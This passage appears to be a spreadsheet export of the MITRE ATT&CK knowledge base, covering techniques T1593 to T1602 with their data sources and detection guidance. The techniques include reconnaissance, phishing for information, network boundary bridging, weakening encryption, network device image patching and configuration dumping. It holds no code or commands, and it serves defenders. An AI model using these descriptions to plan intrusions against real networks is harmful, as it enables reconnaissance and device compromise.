    <t>Before compromising a victim, adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
Adversaries may search in different online sites depending on what information they seek to gather.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[External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>T1593.001</t>
  </si>
  <si>
    <t>Social Media</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
Adversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).(Citation: Cyware Social Media)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[Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>T1593.002</t>
  </si>
  <si>
    <t>Search Engines</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
Adversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials.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[Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>T1594</t>
  </si>
  <si>
    <t>Search Victim-Owned Websites</t>
  </si>
  <si>
    <t>Web logs</t>
  </si>
  <si>
    <t>Monitor for suspicious network traffic that could be indicative of adversary reconnaissance, such as rapid successions of requests indicative of web crawling and/or large quantities of requests originating from a single source (especially if the source is known to be associated with an adversary). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
Adversaries may search victim-owned websites to gather actionable information.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[Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>T1595</t>
  </si>
  <si>
    <t>Active Scanning</t>
  </si>
  <si>
    <t>Packet capture,Network device logs</t>
  </si>
  <si>
    <t>Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.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</si>
  <si>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Before compromising a victim, adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting)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</si>
  <si>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T1595.001</t>
  </si>
  <si>
    <t>Scanning IP Blocks</t>
  </si>
  <si>
    <t>Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).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</si>
  <si>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Before compromising a victim, adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
Adversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan)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t>
  </si>
  <si>
    <t>T1595.002</t>
  </si>
  <si>
    <t>Vulnerability Scanning</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
These scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning)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[Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).</t>
  </si>
  <si>
    <t>T1596</t>
  </si>
  <si>
    <t>Search Open Technical Databases</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)
Adversaries may search in different open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</si>
  <si>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T1596.001</t>
  </si>
  <si>
    <t>DNS/Passive DNS</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
Adversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)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</si>
  <si>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T1596.002</t>
  </si>
  <si>
    <t>WHOIS</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
Adversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),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</si>
  <si>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T1596.003</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
Adversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>T1596.004</t>
  </si>
  <si>
    <t>CDNs</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
Adversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.(Citation: DigitalShadows CDN) Information from these sources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[Drive-by Compromise](https://attack.mitre.org/techniques/T1189)).</t>
  </si>
  <si>
    <t>T1596.005</t>
  </si>
  <si>
    <t>Scan Databases</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
Adversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595)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</si>
  <si>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T1597</t>
  </si>
  <si>
    <t>Search Closed Sources</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
Adversaries may search in different closed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</si>
  <si>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T1597.001</t>
  </si>
  <si>
    <t>Threat Intel Vendors</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
Adversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>T1597.002</t>
  </si>
  <si>
    <t>Purchase Technical Data</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
Adversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.(Citation: ZDNET Selling Data)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</si>
  <si>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T1598</t>
  </si>
  <si>
    <t>Phishing for Information</t>
  </si>
  <si>
    <t>Social media monitoring,Mail server,Email gateway</t>
  </si>
  <si>
    <t>Depending on the specific method of spearphishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
When it comes to following links, monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.
Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).</t>
  </si>
  <si>
    <t>Before compromising a victim, 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t>
  </si>
  <si>
    <t>T1598.001</t>
  </si>
  <si>
    <t>Spearphishing Service</t>
  </si>
  <si>
    <t>Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).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</si>
  <si>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Before compromising a victim, adversaries may send spearphishing messages via third-party services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ThreatPost Social Media Phishing) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.</t>
  </si>
  <si>
    <t>T1598.002</t>
  </si>
  <si>
    <t>Mail server,Email gateway</t>
  </si>
  <si>
    <t>Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may send spearphishing messages with a malicious attachment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attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.</t>
  </si>
  <si>
    <t>T1598.003</t>
  </si>
  <si>
    <t>Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
Monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may send spearphishing messages with a malicious link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the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.</t>
  </si>
  <si>
    <t>T1599</t>
  </si>
  <si>
    <t>Network Boundary Bridging</t>
  </si>
  <si>
    <t>Consider monitoring network traffic on both interfaces of border network devices with out-of-band packet capture or network flow data, using a different device than the one in question.  Look for traffic that should be prohibited by the intended network traffic policy enforcement for the border network device.
Monitor the border network device’s configuration to validate that the policy enforcement sections are what was intended.  Look for rules that are less restrictive, or that allow specific traffic types that were not previously authorized.</t>
  </si>
  <si>
    <t>Adversaries may bridge network boundaries by compromising perimeter network devices. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.
Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001).  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.</t>
  </si>
  <si>
    <t>Router ACL,Firewall</t>
  </si>
  <si>
    <t>T1599.001</t>
  </si>
  <si>
    <t>Network Address Translation Traversal</t>
  </si>
  <si>
    <t>Consider monitoring network traffic on both interfaces of border network devices.  Compare packets transmitted by the device between networks to look for signs of NAT being implemented.  Packets which have their IP addresses changed should still have the same size and contents in the data encapsulated beyond Layer 3.  In some cases, Port Address Translation (PAT) may also be used by an adversary.
Monitor the border network device’s configuration to determine if any unintended NAT rules have been added without authorization.</t>
  </si>
  <si>
    <t>Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.
Network devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device.  A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)
When an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design.  In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device.  In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders.  
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities</t>
  </si>
  <si>
    <t>T1600</t>
  </si>
  <si>
    <t>Weaken Encryption</t>
  </si>
  <si>
    <t>There is no documented method for defenders to directly identify behaviors that weaken encryption. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). Some detection methods require vendor support to aid in investigation.</t>
  </si>
  <si>
    <t>Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
Encryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.
Adversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>Encryption</t>
  </si>
  <si>
    <t>T1600.001</t>
  </si>
  <si>
    <t>Reduce Key Space</t>
  </si>
  <si>
    <t>There is no documented method for defenders to directly identify behaviors that reduce encryption key space. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.</t>
  </si>
  <si>
    <t>Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.
Adversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>T1600.002</t>
  </si>
  <si>
    <t>Disable Crypto Hardware</t>
  </si>
  <si>
    <t>There is no documented method for defenders to directly identify behaviors that disable cryptographic hardware. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.</t>
  </si>
  <si>
    <t>Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
Many network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>T1601</t>
  </si>
  <si>
    <t>Modify System Image</t>
  </si>
  <si>
    <t>Network device run-time memory,Network device configuration,File monitoring</t>
  </si>
  <si>
    <t>Most embedded network devices provide a command to print the version of the currently running operating system.  Use this command to query the operating system for its version number and compare it to what is expected for the device in question.  Because this method may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. 
Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source.  Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not.  Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.  (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)
Many vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory.  If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)</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</si>
  <si>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
To change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it.  This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.</t>
  </si>
  <si>
    <t>T1601.001</t>
  </si>
  <si>
    <t>Patch System Image</t>
  </si>
  <si>
    <t>Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source.  Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not.  Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)
Many vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory.  If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file.  Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.
To change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection.  The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.
To change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system.  This method typically requires administrative level access to the device.
In the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system.  Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory.  This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.
By modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599).  Adding new capabilities for the adversary’s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).
Adversaries may also compromise existing commands in the operating system to produce false output to mislead defenders.   When this method is used in conjunction with [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system.  By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade. 
When the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). 
When the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots.  However, live memory modification of the operating system can be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence. </t>
  </si>
  <si>
    <t>T1601.002</t>
  </si>
  <si>
    <t>Downgrade System Image</t>
  </si>
  <si>
    <t>Network device configuration,File monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">Many embedded network devices provide a command to print the version of the currently running operating system.  Use this command to query the operating system for its version number and compare it to what is expected for the device in question.  Because image downgrade may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may install an older version of the operating system of a network device to weaken security.  Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)
On embedded devices, downgrading the version typically only requires replacing the operating system file in storage.  With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart.  The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.
Downgrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600).  Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001).  </t>
  </si>
  <si>
    <t>T1602</t>
  </si>
  <si>
    <t>Data from Configuration Repository</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Network protocol analysis,Packet capture</t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks that solicits and obtains the configuration information of the queried device.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)</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</si>
  <si>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
Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)</t>
  </si>
  <si>
    <t>T1602.001</t>
  </si>
  <si>
    <t>SNMP (MIB Dump)</t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks that expose MIB content or use unauthorized protocols.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).
The MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details.
Adversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) </t>
  </si>
  <si>
    <t>T1602.002</t>
  </si>
  <si>
    <t>Network Device Configuration Dump</t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration. (Citation: US-CERT TA18-068A 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.
Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files. (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) (Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. </t>
  </si>
  <si>
    <t>Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain or related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA)</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These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Hijacking](https://attack.mitre.org/techniques/T1574/001).
